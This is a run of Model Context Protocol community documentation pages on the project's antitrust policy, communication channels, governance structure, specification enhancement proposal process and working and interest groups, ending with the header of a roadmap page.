The goal of the Model Context Protocol open source project (the "Project") is to develop a universal standard for model-to-world interactions, including enabling LLMs and agents to seamlessly connect with and utilize external data sources and tools. The purpose of this Antitrust Policy (the "Policy") is to avoid antitrust risks in carrying out this pro-competitive mission.
Participants in and contributors to the Project (collectively, "participants") will use their best reasonable efforts to comply in all respects with all applicable state and federal antitrust and trade regulation laws, and applicable antitrust/competition laws of other countries (collectively, the "Antitrust Laws").
The goal of Antitrust Laws is to encourage vigorous competition. Nothing in this Policy prohibits or limits the ability of participants to make, sell or use any product, or otherwise to compete in the marketplace. This Policy provides general guidance on compliance with Antitrust Law. Participants should contact their respective legal counsel to address specific questions.
This Policy is conservative and is intended to promote compliance with the Antitrust Laws, not to create duties or obligations beyond what the Antitrust Laws actually require. In the event of any inconsistency between this Policy and the Antitrust Laws, the Antitrust Laws preempt and control.
## Participation
Technical participation in the Project shall be open to all, subject only to compliance with the provisions of the Project's charter and other governance documents.
## Conduct of Meetings
At meetings among actual or potential competitors, there is a risk that participants in those meetings may improperly disclose or discuss information in violation of the Antitrust Laws or otherwise act in an anti-competitive manner. To avoid this risk, participants must adhere to the following policies when participating in Project-related or sponsored meetings, conference calls, or other forums (collectively, "Project Meetings").
Participants must not, in fact or appearance, discuss or exchange information regarding:
* An individual company's current or projected prices, price changes, price differentials, markups, discounts, allowances, terms and conditions of sale, including credit terms, etc., or data that bear on prices, including profits, margins or cost.
* Industry-wide pricing policies, price levels, price changes, differentials, or the like.
* Actual or projected changes in industry production, capacity or inventories.
* Matters relating to bids or intentions to bid for particular products, procedures for responding to bid invitations or specific contractual arrangements.
* Plans of individual companies concerning the design, characteristics, production, distribution, marketing or introduction dates of particular products, including proposed territories or customers.
* Matters relating to actual or potential individual suppliers that might have the effect of excluding them from any market or of influencing the business conduct of firms toward such suppliers.
* Matters relating to actual or potential customers that might have the effect of influencing the business conduct of firms toward such customers.
* Individual company current or projected cost of procurement, development or manufacture of any product.
* Individual company market shares for any product or for all products.
* Confidential or otherwise sensitive business plans or strategy.
In connection with all Project Meetings, participants must do the following:
* Adhere to prepared agendas.
* Insist that meeting minutes be prepared and distributed to all participants, and that meeting minutes accurately reflect the matters that transpired.
* Consult with their respective counsel on all antitrust questions related to Project Meetings.
* Protest against any discussions that appear to violate these policies or the Antitrust Laws, leave any meeting in which such discussions continue, and either insist that such protest be noted in the minutes.
## Requirements/Standard Setting
The Project may establish standards, technical requirements and/or specifications for use (collectively, "requirements"). Participants shall not enter into agreements that prohibit or restrict any participant from establishing or adopting any other requirements. Participants shall not undertake any efforts, directly or indirectly, to prevent any firm from manufacturing, selling, or supplying any product not conforming to a requirement.
The Project shall not promote standardization of commercial terms, such as terms for license and sale.
## Contact Information
To contact the Project regarding matters addressed by this Antitrust Policy, please send an email to [antitrust@modelcontextprotocol.io](mailto:antitrust@modelcontextprotocol.io), and reference "Antitrust Policy" in the subject line.
# Contributor Communication
Source: https://modelcontextprotocol.io/community/communication
Communication strategy and framework for the Model Context Protocol community
This document explains how to communicate and collaborate within the Model Context Protocol (MCP) project.
## Communication Channels
In short:
* **[Discord][discord-join]**: For real-time or ad-hoc discussions.
* **[GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions)**: For structured, longer-form discussions.
* **[GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues)**: For actionable tasks, bug reports, and feature requests.
* **For security-sensitive issues**: Follow the process in [SECURITY.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md).
All communication is governed by our [Code of Conduct](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CODE_OF_CONDUCT.md). We expect all participants to maintain respectful, professional, and inclusive interactions across all channels.
### Discord
For real-time contributor discussion and collaboration. The server is designed around **MCP contributors** and is not intended
to be a place for general MCP support.
The Discord server will have both public and private channels.
[Join the Discord server here][discord-join].
#### Public Channels (Default)
* **Purpose**: Open community engagement, collaborative development, and transparent project coordination.
* Primary use cases:
* **Public SDK and tooling development**: All development, from ideation to release planning, happens in public channels (e.g., `#typescript-sdk-dev`, `#inspector-dev`).
* **[Working and Interest Group](/community/working-interest-groups) discussions**
* **Community onboarding** and contribution guidance.
* **Community feedback** and collaborative brainstorming.
* Public **office hours** and **maintainer availability**.
* Avoid:
* MCP user support: participants are expected to read official documentation and start new GitHub Discussions for questions or support.
* Service or product marketing: interactions on this Discord are expected to be vendor-neutral and not used for brand-building or sales. Mentions of brands or products are discouraged outside of being used as examples or responses to conversations that start off focused on the specification.
#### Private channels (Exceptions)
* **Purpose**: Confidential coordination and sensitive matters that cannot be discussed publicly. Access will be restricted to designated maintainers.
* **Strict criteria for private use**:
* **Security incidents** (CVEs, protocol vulnerabilities).
* **People matters** (maintainer-related discussions, code of conduct policies).
* Select channels will be configured to be **read-only**. This can be good for example for maintainer decision making.
* Coordination requiring **immediate** or otherwise **focused response** with a limited audience.
* **Transparency**:
* **All technical and governance decisions** affecting the community **must be documented** in GitHub Discussions and/or Issues, and will be labeled with `notes`.
* **Some matters related to individual contributors** may remain private when appropriate (e.g., personal circumstances, disciplinary actions, or other sensitive individual matters).
* Private channels are to be used as **temporary "incident rooms,"** not for routine development.
Any significant discussion on Discord that leads to a potential decision or proposal must be moved to a GitHub Discussion or GitHub Issue to create a persistent, searchable record. Proposals will then be promoted to full-fledged PRs with associated work items (GitHub Issues) as needed.
### GitHub Discussions
For structured, long-form discussion and debate on project direction, features, improvements, and community topics.
When to use:
* Project roadmap planning and milestone discussions
* Announcements and release communications
* Community polls and consensus-building processes
* Feature requests with context and rationale
* If a particular repository does not have GitHub Discussions enabled, feel free to open a GitHub Issue instead.
### GitHub Issues
For bug reports, feature tracking, and actionable development tasks.
When to use:
* Bug reports with reproducible steps
* Documentation improvements with specific scope
* CI/CD problems and infrastructure issues
* Release tasks and milestone tracking
**Note**: SEP proposals are submitted as pull requests to the [`seps/` directory](https://github.com/modelcontextprotocol/specification/tree/main/seps), not as GitHub Issues. See the [SEP guidelines](./sep-guidelines) for details.
### Security Issues
**Do not post security issues publicly.** Instead:
1. Use the private security reporting process. For protocol-level security issues, follow the process in [SECURITY.md in the modelcontextprotocol GitHub repository](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md).
2. Contact lead and/or [core maintainers](./governance#current-core-maintainers) directly.
3. Follow responsible disclosure guidelines.
## Decision Records
All MCP decisions are documented and captured in public channels.
* **Technical decisions**: [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and [SEPs](https://github.com/modelcontextprotocol/specification/tree/main/seps).
* **Specification changes**: [On the Model Context Protocol website](https://modelcontextprotocol.io/specification/draft/changelog).
* **Process changes**: [Community documentation](https://modelcontextprotocol.io/community/governance).
* **Governance decisions and updates**: [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and [SEPs](https://github.com/modelcontextprotocol/specification/tree/main/seps).
When documenting decisions, we will retain as much context as possible:
* Decision makers
* Background context and motivation
* Options that were considered
* Rationale for the chosen approach
* Implementation steps
[discord-join]: https://discord.gg/6CSzBmMkjX
# Governance and Stewardship
Source: https://modelcontextprotocol.io/community/governance
Learn about the Model Context Protocol's governance structure and how to participate in the community
The Model Context Protocol (MCP) follows a formal governance model to ensure transparent decision-making and community participation. This document outlines how the project is organized and how decisions are made.
## General Project Policies
Model Context Protocol has been established as Model Context Protocol a Series of LF Projects, LLC. Policies applicable to Model Context Protocol and participants in Model Context Protocol, including guidelines on the usage of trademarks, are located at [https://www.lfprojects.org/policies/](https://www.lfprojects.org/policies/). Governance changes approved as per the provisions of this governance document must also be approved by LF Projects, LLC.
Model Context Protocol participants acknowledge that the copyright in all new contributions will be retained by the copyright holder as independent works of authorship and that no contributor or copyright holder will be required to assign copyrights to the project.
Except as described below, all code and specification contributions to the project must be made using the Apache License, Version 2.0 (available here: [https://www.apache.org/licenses/LICENSE-2.0](https://www.apache.org/licenses/LICENSE-2.0)) (the "Project License").
All outbound code and specifications will be made available under the Project License. The Core Maintainers may approve the use of an alternative open license or licenses for inbound or outbound contributions on an exception basis.
All documentation (excluding specifications) will be made available under Creative Commons Attribution 4.0 International license, available at: [https://creativecommons.org/licenses/by/4.0](https://creativecommons.org/licenses/by/4.0).
## Technical Governance
The MCP project adopts a hierarchical structure, similar to Python, PyTorch and other open source projects:
* A community of **contributors** who file issues, make pull requests, and contribute to the project.
* A small set of **maintainers** drive components within the MCP project, such as SDKs, documentation, and others.
* Contributors and maintainers are overseen by **core maintainers**, who drive the overall project direction.
* The core maintainers have two **lead core maintainers** who are the catch-all decision makers.
* Maintainers, core maintainers, and lead core maintainers form the **MCP steering group**.
All maintainers are expected to have a strong bias towards MCP's design philosophy. Membership in the technical governance process is for individuals, not companies. That is, there are no seats reserved for specific companies, and membership is associated with the person rather than the company employing that person. This ensures that maintainers act in the best interests of the protocol itself and the open source community.
### Channels
Technical Governance is facilitated through a shared [Discord server](/community/communication#discord) of all **maintainers, core maintainers** and **lead maintainers**. Each maintainer group can choose additional communication channels, but all decisions and their supporting discussions must be recorded and made transparently available on the Discord server.
### Maintainers
Maintainers are responsible for [Working or Interest Groups](/community/working-interest-groups) within the MCP project. These generally are independent repositories such as language-specific SDKs, but can also extend to subdirectories of a repository, such as the MCP documentation. Maintainers may adopt their own rules and procedures for making decisions. Maintainers are expected to make decisions for their respective projects independently, but can defer or escalate to the core maintainers when needed.
Maintainers are responsible for the:
* Thoughtful and productive engagement with community contributors,
* Maintaining and improving their respective area of the MCP project,
* Supporting documentation, roadmaps and other adjacent parts of the MCP project,
* Present ideas from community to core.
Maintainers are encouraged to propose additional maintainers when needed. Maintainers can only be appointed and removed by core maintainers or lead core maintainers at any time and without reason.
Maintainers have write and/or admin access to their respective repositories.
### Core Maintainers
The core maintainers are expected to have a deep understanding of the Model Context Protocol and its specification. Their responsibilities include:
* Designing, reviewing and steering the evolution of the MCP specification, as well as all other parts of the MCP project, such as documentation,
* Articulating a cohesive long-term vision for the project,
* Mediating and resolving contentious issues with fairness and transparency, seeking consensus where possible while making decisive choices when necessary,
* Appoint or remove maintainers,
* Stewardship of the MCP project in the best interest of MCP.
The core maintainers as a group have the power to veto any decisions made by maintainers by majority vote. The core maintainers have power to resolve disputes as they see fit. The core maintainers should publicly articulate their decision-making. The core group is responsible for adopting their own procedures for making decisions.
Core maintainers generally have write and admin access to all MCP repositories, but should use the same contribution (usually pull-requests) mechanism as outside contributors. Exceptions can be made based on security considerations.
### Lead Maintainers (BDFL)
MCP has two lead maintainers: Justin Spahr-Summers and David Soria Parra. Lead Maintainers can veto any decision by core maintainers or maintainers. This model is also commonly known as Benevolent Dictator for Life (BDFL) in the open source community. The Lead Maintainers should publicly articulate their decision-making and give clear reasoning for their decisions. Lead maintainers are part of the core maintainer group.
The Lead Maintainers are responsible for confirming or removing core maintainers.
Lead Maintainers are administrators on all infrastructure for the MCP project where possible. This includes but is not restricted to all communication channels, GitHub organizations and repositories.
### Decision Process
The core maintainer group meets every two weeks to discuss and vote on proposals, as well as discuss any topics needed. The shared Discord server can be used to discuss and vote on smaller proposals if needed.
The lead maintainer, core maintainer, and maintainer group should attempt to meet in person every three to six months.
## Processes
Core and lead maintainers are responsible for all aspects of Model Context Protocol, including documentation, issues, suggestions for content, and all other parts under the [MCP project](https://github.com/modelcontextprotocol). Maintainers are responsible for documentation, issues, and suggestions of content for their area of the MCP project, but are encouraged to partake in general maintenance of the MCP projects. Maintainers, core maintainers, and lead maintainers should use the same contribution process as external contributors, rather than making direct changes to repos. This provides insight into intent and opportunity for discussion.
### Working and Interest Groups
MCP collaboration and contributions are organized around two structures: [Working Groups and Interest Groups](/community/working-interest-groups).
Interest Groups are responsible for identifying and articulating problems that MCP should address, primarily by facilitating open discussions within the community. In contrast, Working Groups focus on developing concrete solutions by collaboratively producing deliverables, such as SEPs or community-owned implementations of the specification. While input from Interest Groups can help justify the formation of a Working Group, it is not a strict requirement. Similarly, contributions from either Interest Groups or Working Groups are encouraged, but not mandatory, when submitting SEPs or other community proposals.
We strongly encourage all contributors interested in working on a specific SEP to first collaborate within an Interest Group. This collaborative process helps ensure that the proposed SEP aligns with protocol needs and is the right direction for its adopters.
#### Governance Principles
All groups are self-governed while adhering to these core principles:
1. Clear contribution and decision-making processes
2. Open communication and transparent decisions
Both must:
* Document their contribution process
* Maintain transparent communication
* Make decisions publicly (groups must publish meeting notes and proposals)
Projects and working groups without specified processes default to:
* GitHub pull requests and issues for contributions
* A public channel in the official [MCP Contributor Discord](/community/communication#discord)
#### Maintenance Responsibilities
Components without dedicated maintainers (such as documentation) fall under core maintainer responsibility. These follow standard contribution guidelines through pull requests, with maintainers handling reviews and escalating to core maintainer review for any significant changes.
Core maintainers and maintainers are encouraged to improve any part of the MCP project, regardless of formal maintenance assignments.
### Specification Project
#### Specification Enhancement Proposal (SEP)
Proposed changes to the specification must come in the form of a written version, starting with a summary of the proposal, outlining the **problem** it tries to solve, propose **solution**, **alternatives**, **considerations, outcomes** and **risks**. The [SEP Guidelines](/community/sep-guidelines) outline information on the expected structure of SEPs. SEPs are submitted as pull requests to the [`seps/` directory](https://github.com/modelcontextprotocol/specification/tree/main/seps) in the specification repository.
All proposals must have a **sponsor** from the MCP steering group (maintainer, core maintainer or lead core maintainer). The sponsor is responsible for ensuring that the proposal is actively developed, meets the quality standard for proposals, **updating the SEP status** in the markdown file, and presenting and discussing it in meetings of core maintainers. Maintainer and Core Maintainer groups should review open proposals without sponsors at regular intervals. Proposals that do not find a sponsor within six months are automatically rejected.
Once proposals have a sponsor, the sponsor assigns themselves to the PR and updates the SEP status to `draft`.
## Communication
### Core Maintainer Meetings
The core maintainer group meets on a bi-weekly basis to discuss proposals and the project. Notes on proposals should be made public. The core maintainer group will strive to meet in person every 3-6 months.
### Public Chat
The MCP project maintains a [public Discord server](/community/communication#discord) with open chats for interest groups. The MCP project may have private channels for certain communications.
## Nominating, Confirming and Removing Maintainers
### The Principles
* Membership in module maintainer groups is given to **individuals** on merit basis after they demonstrated strong expertise of their area of work through contributions, reviews, and discussions and are aligned with the overall MCP direction.
* For membership in the **maintainer** group the individual has to demonstrate strong and continued alignment with the overall MCP principles.
* No term limits for module maintainers or core maintainers
* Light criteria of moving working-group or sub-project maintenance to 'emeritus' status if they don't actively participate over long periods of time. Each maintainer group may define the inactive period that's appropriate for their area.
* The membership is for an individual, not a company.
### Nomination and Removal
* The lead maintainers are responsible for adding and removing core maintainers.
* Core maintainers are responsible for adding and removing maintainers. They will take the consideration of existing maintainers into account.
* If a Working or Interest Group with 2+ existing maintainers unanimously agrees to add additional maintainers (up to a maximum of 5), they may do so without core maintainer review.
#### Nomination Process
If a Maintainer (or Core / Lead Maintainer) wishes to propose a nomination for the Core / Lead Maintainers’ consideration, they should follow the following process:
1. Collect evidence for the nomination. This will generally come in the form of a history of merged PRs on the repositories for which maintainership is being considered.
2. Discuss among maintainers of the relevant group(s) as to whether they would be supportive of approving the nomination.
3. DM a Community Moderator or Core Maintainer to create a private channel in Discord, in the format `nomination-{name}-{group}`. Add all core maintainers, lead maintainers, and co-maintainers on the relevant group.
4. Provide context for the individual under nomination. See below for suggestions on what to include here.
5. Create a Discord Poll and ask Core / Lead Maintainers to vote Yes / No on the nomination. Reaching consensus is encouraged though not required.
6. After Core / Lead Maintainers discuss and/or vote, if the nomination is favorable, relevant members with permissions to update GitHub an Discord roles will add the nominee to the appropriate groups. The nominator should announce the new maintainership in the relevant Discord channel.
7. The temporary Discord channel will be deleted a week later.
Suggestions for the kind of information to share with core maintainers when nominating someone:
* GitHub profile link, LinkedIn profile link, Discord username
* For what group(s) are you nominating the individual for maintainership
* Whether the group(s) agree that this person should be elevated to maintainership
* Description of their contributions to date (including links to most substantial contributions)
* Description of expected contributions moving forward (e.g. Are they eager to be a maintainer? Will they have capacity to do so?)
* Other context about the individual (e.g. current employer, motivations behind MCP involvement)
* Anything else you think may be relevant to consider for the nomination
## Current Core Maintainers
* Inna Harper
* Basil Hosmer
* Paul Carleton
* Nick Cooper
* Nick Aldridge
* Che Liu
* Den Delimarsky
## Current Maintainers and Working Groups
Refer to [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md).
# SEP Guidelines
Source: https://modelcontextprotocol.io/community/sep-guidelines
Specification Enhancement Proposal (SEP) guidelines for proposing changes to the Model Context Protocol
## What is a SEP?
SEP stands for Specification Enhancement Proposal. A SEP is a design document providing information to the MCP community, or describing a new feature for the Model Context Protocol or its processes or environment. The SEP should provide a concise technical specification of the feature and a rationale for the feature.
We intend SEPs to be the primary mechanisms for proposing major new features, for collecting community input on an issue, and for documenting the design decisions that have gone into MCP. The SEP author is responsible for building consensus within the community and documenting dissenting opinions.
SEPs are maintained as markdown files in the [`seps/` directory](https://github.com/modelcontextprotocol/specification/tree/main/seps) of the specification repository. Their revision history serves as the historical record of the feature proposal.
## What qualifies as a SEP?
The goal is to reserve the SEP process for changes that are substantial enough to require broad community discussion, a formal design document, and a historical record of the decision-making process. A regular GitHub pull request is often more appropriate for smaller, more direct changes.
Consider proposing a SEP if your change involves any of the following:
* **A New Feature or Protocol Change**: Any change that adds, modifies, or removes features in the Model Context Protocol. This includes:
* Adding new API endpoints or methods.
* Changing the syntax or semantics of existing data structures or messages.
* Introducing a new standard for interoperability between different MCP-compatible tools.
* Significant changes to how the specification itself is defined, presented, or validated.
* **A Breaking Change**: Any change that is not backwards-compatible.
* **A Change to Governance or Process**: Any proposal that alters the project's decision-making, contribution guidelines (like this document itself).
* **A Complex or Controversial Topic**: If a change is likely to have multiple valid solutions or generate significant debate, the SEP process provides the necessary framework to explore alternatives, document the rationale, and build community consensus before implementation begins.
## SEP Types
There are three kinds of SEP:
1. **Standards Track** SEP describes a new feature or implementation for the Model Context Protocol. It may also describe an interoperability standard that will be supported outside the core protocol specification.
2. **Informational** SEP describes a Model Context Protocol design issue, or provides general guidelines or information to the MCP community, but does not propose a new feature. Informational SEPs do not necessarily represent an MCP community consensus or recommendation.
3. **Process** SEP describes a process surrounding MCP, or proposes a change to (or an event in) a process. Process SEPs are like Standards Track SEPs but apply to areas other than the MCP protocol itself.
## Submitting a SEP
The SEP process begins with a new idea for the Model Context Protocol. It is highly recommended that a single SEP contain a single key proposal or new idea. Small enhancements or patches often don't need a SEP and can be injected into the MCP development workflow with a pull request to the MCP repo. The more focused the SEP, the more successful it tends to be.
Each SEP must have an **SEP author** -- someone who writes the SEP using the style and format described below, shepherds the discussions in the appropriate forums, and attempts to build community consensus around the idea. The SEP author should first attempt to ascertain whether the idea is SEP-able. Posting to the MCP community forums (Discord, GitHub Discussions) is the best way to go about this.
### SEP Workflow
SEPs are submitted as pull requests to the [`seps/` directory](https://github.com/modelcontextprotocol/specification/tree/main/seps) in the specification repository. The standard SEP workflow is:
1. **Draft your SEP** as a markdown file named `0000-your-feature-title.md`, using `0000` as a placeholder for the SEP number. Follow the [SEP format](#sep-format) described below.
2. **Create a pull request** adding your SEP file to the `seps/` directory in the [specification repository](https://github.com/modelcontextprotocol/specification).
3. **Update the SEP number**: Once your PR is created, amend your commit to rename the file using the PR number (e.g., PR #1850 becomes `1850-your-feature-title.md`) and update the SEP header to reference the correct number.
4. **Find a Sponsor**: Tag a Core Maintainer or Maintainer from [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) in your PR to request sponsorship. Maintainers regularly review open proposals to determine which to sponsor.
5. **Sponsor assigns themselves**: Once a sponsor agrees, they will assign themselves to the PR and update the SEP status to `draft` in the markdown file.
6. **Informal review**: The sponsor reviews the proposal and may request changes based on community feedback. Discussion happens in the PR comments.
7. **Formal review**: When the SEP is ready, the sponsor updates the status to `in-review`. The SEP enters formal review by the Core Maintainers team.
8. **Resolution**: The SEP may be `accepted`, `rejected`, or returned for revision. The sponsor updates the status accordingly.
9. **Finalization**: Once accepted, the reference implementation must be completed. When complete and incorporated into the specification, the sponsor updates the status to `final`.
If a SEP has not found a sponsor within six months, Core Maintainers may close the PR and mark the SEP as `dormant`.
### SEP Format
Each SEP should have the following parts:
1. **Preamble** -- A short descriptive title, the names and contact info for each author, the current status, SEP type, and PR number.
2. **Abstract** -- A short (\~200 word) description of the technical issue being addressed.
3. **Motivation** -- The motivation should clearly explain why the existing protocol specification is inadequate to address the problem that the SEP solves. The motivation is critical for SEPs that want to change the Model Context Protocol. SEP submissions without sufficient motivation may be rejected outright.
4. **Specification** -- The technical specification should describe the syntax and semantics of any new protocol feature. The specification should be detailed enough to allow competing, interoperable implementations.
5. **Rationale** -- The rationale explains why particular design decisions were made. It should describe alternate designs that were considered and related work. The rationale should provide evidence of consensus within the community and discuss important objections or concerns raised during discussion.
6. **Backward Compatibility** -- All SEPs that introduce backward incompatibilities must include a section describing these incompatibilities and their severity. The SEP must explain how the author proposes to deal with these incompatibilities.
7. **Reference Implementation** -- The reference implementation must be completed before any SEP is given status "Final", but it need not be completed before the SEP is accepted. While there is merit to the approach of reaching consensus on the specification and rationale before writing code, the principle of "rough consensus and running code" is still useful when it comes to resolving many discussions of protocol details.
8. **Security Implications** -- If there are security concerns in relation to the SEP, those concerns should be explicitly written out to make sure reviewers of the SEP are aware of them.
See the [SEP template](https://github.com/modelcontextprotocol/specification/blob/main/seps/README.md#sep-file-structure) for the complete file structure.
### SEP States
SEPs can be in one of the following states:
* `draft`: SEP proposal with a sponsor, undergoing informal review.
* `in-review`: SEP proposal ready for formal review by Core Maintainers.
* `accepted`: SEP accepted by Core Maintainers, but still requires final wording and reference implementation.
* `rejected`: SEP rejected by Core Maintainers.
* `withdrawn`: SEP withdrawn by the author.
* `final`: SEP finalized with reference implementation complete.
* `superseded`: SEP has been replaced by a newer SEP.
* `dormant`: SEP that has not found a sponsor and was subsequently closed.
### Status Management
**The Sponsor is responsible for updating the SEP status.** This ensures that status transitions are made by someone with the authority and context to do so appropriately. The sponsor:
1. Updates the `Status` field directly in the SEP markdown file
2. Applies matching labels to the pull request (e.g., `draft`, `in-review`, `accepted`)
Both the markdown status field and PR labels should be kept in sync. The markdown file serves as the canonical record (versioned with the proposal), while PR labels make it easy to filter and search for SEPs by status.
Authors should request status changes through their sponsor rather than modifying the status field or labels themselves.
### SEP Review & Resolution
SEPs are reviewed by the MCP Core Maintainers team on a bi-weekly basis.
For a SEP to be accepted it must meet certain minimum criteria:
* A prototype implementation demonstrating the proposal
* Clear benefit to the MCP ecosystem
* Community support and consensus
Once a SEP has been accepted, the reference implementation must be completed. When the reference implementation is complete and incorporated into the main source code repository, the status will be changed to "Final".
A SEP can also be "Rejected" or "Withdrawn". A SEP that is "Withdrawn" may be re-submitted at a later date.
## The Sponsor Role
A Sponsor is a Core Maintainer or Maintainer who champions the SEP through the review process. The sponsor's responsibilities include:
* Reviewing the proposal and providing constructive feedback
* Requesting changes based on community input
* **Updating the SEP status** as the proposal progresses through the workflow
* Initiating formal review when the SEP is ready
* Presenting and discussing the proposal at Core Maintainer meetings
* Ensuring the proposal meets quality standards
## Reporting SEP Bugs, or Submitting SEP Updates
How you report a bug, or submit a SEP update depends on several factors, such as the maturity of the SEP, the preferences of the SEP author, and the nature of your comments. For SEPs not yet reaching `final` state, it's probably best to comment directly on the SEP's pull request. Once a SEP is finalized and merged, you may submit updates by creating a new pull request that modifies the SEP file.
## Transferring SEP Ownership
It occasionally becomes necessary to transfer ownership of SEPs to a new SEP author. In general, we'd like to retain the original author as a co-author of the transferred SEP, but that's really up to the original author. A good reason to transfer ownership is because the original author no longer has the time or interest in updating it or following through with the SEP process, or has fallen off the face of the 'net (i.e. is unreachable or not responding to email). A bad reason to transfer ownership is because you don't agree with the direction of the SEP. We try to build consensus around a SEP, but if that's not possible, you can always submit a competing SEP.
## Copyright
This document is placed in the public domain or under the CC0-1.0-Universal license, whichever is more permissive.
# Working and Interest Groups
Source: https://modelcontextprotocol.io/community/working-interest-groups
Learn about the two forms of collaborative groups within the Model Context Protocol's governance structure - Working Groups and Interest Groups.
Within the MCP contributor community we maintain two types of collaboration formats - **Interest** and **Working** groups.
**Interest Groups** are responsible for identifying and articulating problems that MCP should address, primarily by facilitating open discussions within the community. In contrast, **Working Groups** focus on developing concrete solutions by collaboratively producing deliverables, such as SEPs or community-owned implementations of the specification.
While input from Interest Groups can help justify the formation of a Working Group, it is not a strict requirement. Similarly, contributions from either Interest Groups or Working Groups are encouraged, but not mandatory, when submitting SEPs or other community proposals.
We strongly encourage all contributors interested in working on a specific SEP to first collaborate within an Interest Group. This collaborative process helps ensure that the proposed SEP aligns with community needs and is the right direction for the protocol.
Long-term projects in the MCP ecosystem, such as SDKs, Inspector, or Registry are maintained by dedicated Working Groups.
## Purpose
These groups exist to:
* **Facilitate high-signal spaces for focused discussions** - contributors who opt into notifications, expertise sharing, and regular meetings can engage with topics that are highly relevant to them, enabling meaningful contributions and opportunities to learn from others.
* **Establish clear expectations and leadership roles** - guide collaborative efforts and ensure steady progress toward concrete deliverables that advance MCP evolution and adoption.
## Mechanisms
## Meeting Calendar
All Interest Group and Working Group meetings are published on the public MCP community calendar at [meet.modelcontextprotocol.io](https://meet.modelcontextprotocol.io/).
Facilitators are responsible for posting their meeting schedules to this calendar in advance to ensure discoverability and enable broader community participation.
### Interest Groups (IGs)
**Goal:** Facilitate discussion and knowledge-sharing among MCP contributors who share interests in a specific MCP sub-topic or context. The primary focus is on identifying and gathering problems that may be worth addressing through SEPs or other community artifacts, while encouraging open exploration of protocol issues and opportunities.
**Expectations**:
* Regular conversations in the Interest Group Discord channel
* **AND/OR** a recurring live meeting regularly attended by Interest Group members
* Meeting dates and times published in advance on the [MCP community calendar](https://meet.modelcontextprotocol.io/) when applicable, and tagged with their primary topic and interest group Discord channel name (e.g. `auth-ig`)
* Notes publicly shared after meetings, as a GitHub issue ([example](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1629)) and/or public Google Doc
**Examples**:
* Security in MCP
* Auth in MCP
* Using MCP in enterprise settings
* Tooling and practices surrounding hosting MCP servers
* Tooling and practices surrounding implementing MCP clients
**Lifecycle**:
* Creation begins by filling out a template in the #wg-ig-group-creation [Discord](/community/communication#discord) channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group.
* The creation of the group can be reversed at any time (e.g., after new information surfaces). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing IG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group. A maintainer is not required for every group, but can help advocate for specific changes or initiatives.
* IG is retired only when community moderators or Core or Lead Maintainers determine it's no longer active and/or needed
* Successful IGs do not have a time limit or expiration date - as long as they are active and maintained, they will remain available
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* IGs with potentially similar goals/discussions
* How this IG differentiates itself from the related IGs
* First topic you to discuss within the IG
Participation in an Interest Group (IG) is not required to start a Working Group (WG) or to create a SEP. However, building consensus within IGs can be valuable when justifying the formation of a WG. Likewise, referencing support from IGs or WGs can strengthen a SEP and its chances of success.
### Working Groups (WG)
**Goal:** Facilitate collaboration within the MCP community on a SEP, a themed series of SEPs, or an otherwise officially endorsed project.
**Expectations**:
* Meaningful progress towards at least one SEP or spec-related implementation **OR** hold maintenance responsibilities for a project (e.g., Inspector, Registry, SDKs)
* Facilitators are responsible for keeping track of progress and communicating status when appropriate
* Meeting dates and times published in advance on the [MCP community calendar](https://meet.modelcontextprotocol.io/) when applicable, and tagged with their primary topic and working group Discord channel name (e.g. `agents-wg`)
* Notes publicly shared after meetings, as a GitHub issue ([example](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1629)) and/or public Google Doc
**Examples**:
* Registry
* Inspector
* Tool Filtering
* Server Identity
**Lifecycle**:
* Creation begins by filling out a template in #wg-ig-group-creation Discord channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group.
* The creation of the group can be reversed at any time (e.g., after new information surfaces). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing WG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group. A maintainer is not required for every group, but can help advocate for specific changes or initiatives
* WG is retired when either:
* Community moderators or Core and Lead Maintainers decide it is no longer active and/or needed
* The WG no longer has an active Issue/PR for a month or more, or has completed all Issues/PRs it intended to pursue.
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* Explanation of interest/use cases, ideally originating from an IG discussion; however that is not a requirement
* First Issue/PR/SEP that the WG will work on
## WG/IG Facilitators
A **Facilitator** role in a WG or IG does *not* result in a [maintainership role](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) across the MCP organization. It is an informal role into which anyone can self-nominate.
A Facilitator is responsible for helping shepherd discussions and collaboration within an Interest or Working Group.
Lead and Core Maintainers reserve the right to modify the list of Facilitators and Maintainers for any WG/IG at any time.
## FAQ
### How do I get involved contributing to MCP?
These IG and WG abstractions help provide an elegant on-ramp:
1. [Join the Discord](/community/communication#discord) and follow conversations in IGs relevant to you. Attend [live calls](https://meet.modelcontextprotocol.io/). Participate.
2. Offer to facilitate calls. Contribute your use cases in SEP proposals and other work.
3. When you're comfortable contributing to deliverables, jump in to contribute to WG work.
4. Active and valuable contributors will be nominated by WG maintainers as new maintainers.
### Where can I find a list of all current WGs and IGs?
On the [MCP Contributor Discord](/community/communication#discord) there is a section of channels for each Working and Interest Group.
# Roadmap
Source: https://modelcontextprotocol.io/development/roadmap
Our plans for evolving Model Context Protocol
Last updated: **2025-10-31**
